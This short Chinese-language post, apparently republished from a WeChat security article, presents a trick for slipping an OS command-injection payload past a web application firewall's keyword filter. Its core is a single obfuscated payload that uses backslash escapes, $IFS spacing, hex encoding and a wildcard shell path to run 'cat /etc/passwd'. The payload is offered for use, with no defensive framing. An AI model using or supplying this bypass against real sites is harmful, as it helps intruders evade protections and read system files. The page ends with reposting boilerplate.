有时,您可能会在目标网站上获得操作系统命令注入,但由于“echo”、“/etc/”、“cat”、“passwd”等受限关键字,有效负载可能会被 Web 应用程序防火墙 (WAF) 阻止。这是一种成功传送有效负载的 WAF 旁路技术。
e\c\h\o$IFS-e$IFS'\x63\x61\x74\x20\x2F\x65\x74\x63\x2F\x70\x61\x73\x73\x77\x64'|/???/\b**\h感谢您抽出
.
.
来阅读本文
点它,分享点赞在看都在这里
文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247501430&idx=2&sn=36561bbe4bf78b3eb4e97bda5e9f0842&chksm=9bad8f3dacda062bb0f747c8cd118e31293d67fea53494ecbd3f3a972249c19377959bc05ea5&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh